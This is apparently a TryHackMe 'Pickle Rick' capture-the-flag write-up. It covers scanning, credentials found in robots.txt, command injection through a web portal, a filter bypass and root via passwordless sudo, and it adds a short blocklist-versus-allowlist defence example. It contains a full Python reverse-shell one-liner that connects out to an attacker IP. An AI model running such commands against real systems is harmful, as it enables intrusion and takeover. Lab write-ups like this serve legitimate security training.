Last updated
This Rick and Morty themed challenge requires you to exploit a webserver to find 3 ingredients that will help Rick make his potion to transform himself back into a human from a pickle.
^/ sudo nmap -sC -sV <THM_MACHINE> -oN <saveas> -vv
^/ dirbuster (using GUI) > enter THM_MACHINE > start
Next, from dirbuster I found robots, portal.php and login.php.
Try opening THM_MACHINE in a browser, since it has port 80 open. It shows the page below.
Next, let's look at the source code to see if we can find something yummy ...
There is nothing more yummy than a username. Now it is time to move on and proceed with the dirbuster results.
In /robots.txt we found ...
R1ckRul3s : Wubbalubbadubdub
Next proceed to /portal.php
Yeah.. We can log in using the credentials given.
Since it appears to accept commands (CMD), let's try a simple command.
Let's try listing with ls, and use ls * to list all directories and subdirectories.
Let's see which keywords are filtered. Let's find them using this command and open the source code.
grep -R " "
But we can still view the file using less, since it is not filtered.
^/ less Sup3rS3cretPickl3Ingred.txt
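Why a keyword filter like this one does not hold, shown as an added example (it is not the portal's code and not part of the original write-up): a word blocklist next to an action allowlist. The blocked words and the action names are assumptions made for illustration.

```python
# Assumed blocklist; the portal's real list is not shown in the write-up.
BLOCKED_WORDS = {"cat", "head", "tail", "more"}


def blocklist_allows(command: str) -> bool:
    """Weak form: reject a command only if one of its words is blocked."""
    return not any(token in BLOCKED_WORDS for token in command.split())


# Hardened form: the client sends an action name, never a command string.
# Each (hypothetical) action maps to a fixed argv meant to run without a shell.
ALLOWED_ACTIONS = {
    "uptime": ["uptime"],
    "disk": ["df", "-h"],
}


def resolve_action(action: str):
    """Return the fixed argv for a known action, or None for anything else."""
    argv = ALLOWED_ACTIONS.get(action)
    return list(argv) if argv is not None else None


def audit(inputs):
    """For each input, report (input, passes blocklist, passes allowlist)."""
    return [(i, blocklist_allows(i), resolve_action(i) is not None) for i in inputs]


if __name__ == "__main__":
    # Constructed inputs: the viewer used in the write-up, a blocked viewer,
    # and one valid action name.
    samples = [
        "less Sup3rS3cretPickl3Ingred.txt",
        "cat Sup3rS3cretPickl3Ingred.txt",
        "uptime",
    ]
    for text, weak, strong in audit(samples):
        print(f"{text!r:40} blocklist={'pass' if weak else 'block'} "
              f"allowlist={'pass' if strong else 'block'}")
```

The blocklist has to name every program that can read a file, while the allowlist only has to name what the panel is meant to do.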
Now let's move on to the other flags.
I used the basic sudo -l, and the interesting part is that sudo doesn't need a password for anything. That means we can run everything with sudo without a password. Let's find a vulnerability to exploit as root.
First, make a reverse shell and stabilize it.
^/ export RHOST="MACHINE_IP";export RPORT=8989;python3 -c 'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("sh")'
python3 -c "import pty;pty.spawn('/bin/bash')" + Ctrl+Z + stty raw -echo && fg
Now we have a stable connection. Let's play around and find the flags.
User flag - cd home/username
So we proceed to find another flag. Let's try sudo bash.
Note that flags are mostly stored in /root.
Since we are already root, let's find the root flag - cd /root
<coming soon>
Finally, Rick becomes human again. Thank you for your time.
Always check the source code. It might contain useful things.
Do check robots.txt. Sometimes it has something fruity inside.
Using a cmd reverse shell to the remote host.
Learn to modify code and make it useful. Always look for many ways to exploit it.
Next time I will provide patching. (Coming soon)
Start with an nmap scan and fuzzing (I love using dirbuster and ffuf).
> this should be something or maybe password.
Easy machine Try Hack Me